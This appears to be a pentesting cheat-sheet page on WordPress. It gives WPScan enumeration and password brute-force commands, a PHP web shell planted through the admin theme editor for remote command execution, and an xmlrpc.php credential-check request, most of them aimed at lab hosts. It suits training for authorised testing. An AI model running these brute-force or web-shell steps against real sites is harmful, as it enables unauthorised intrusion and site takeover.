Wordpress Pentesting

WordPress Structure

.
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php

WordPress User Roles

There are five types of users in a standard WordPress installation.

Role
Description

Administrator

This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as editing source code.

Editor

An editor can publish and manage posts, including the posts of other users.

Author

Authors can publish and manage their own posts.

Contributor

These users can write and manage their own posts but cannot publish them.

Subscriber

These are normal users who can browse posts and edit their profiles.

WPScan

Basic Scan

wpscan --url http://127.0.0.1

Enumerate Plugins using WPScan

 wpscan --url http://94.237.49.182:58555/ --enumerate ap

Enumerate Users using WPScan

wpscan --url http://94.237.49.182:58555/ --enumerate u

WPScan Aggressive Mode Plugins

wpscan --url http://blog.inlanefreight.local -e ap --no-banner --plugins-detection aggressive --plugins-version-detection aggressive --max-threads 60

ALL in ONE WPSCAN Command

wpscan --url target.com --disable-tls-checks --api-token <api-token> -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force

Normal WPSCAN Bruteforce Attack

wpscan --url http://example.com --passwords /usr/share/wordlists/rockyou.txt

BruteForce attack using WPScan

WPScan can be used to brute force usernames and passwords. The scan report returned three users registered on the website: admin, roger, and david. The tool uses two kinds of login brute force attacks, xmlrpc and wp-login. The wp-login method will attempt to brute force the normal WordPress login page, while the xmlrpc method uses the WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it is faster.

wpscan --password-attack xmlrpc -t 20 -U admin, david -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com

RCE using ThemeEditor

we need to login as Administrator on WordPress Portal, then you need to go to theme editor page

edit the 404 theme and add the reverse shell in it

or you can also add the below code as well

<?php
system($_GET['cmd']);
?>

now save it and visit the below url to access it and execute it

http://<target>/wp-content/themes/twentyseventeen/404.php

and we have successfull RCE.

XMLRPC.php

It is important to note that xmlrpc.php being enabled on a WordPress instance is not a vulnerability. Depending on the methods allowed xmlrpc.php can facilitate some enumeration and exploitation activities, though.

if we have a username and password for the admin user we can try to get the information utilizing the xmlrpc.php 

curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php
PreviousPentesting Redis 6379NextJenkins

Last updated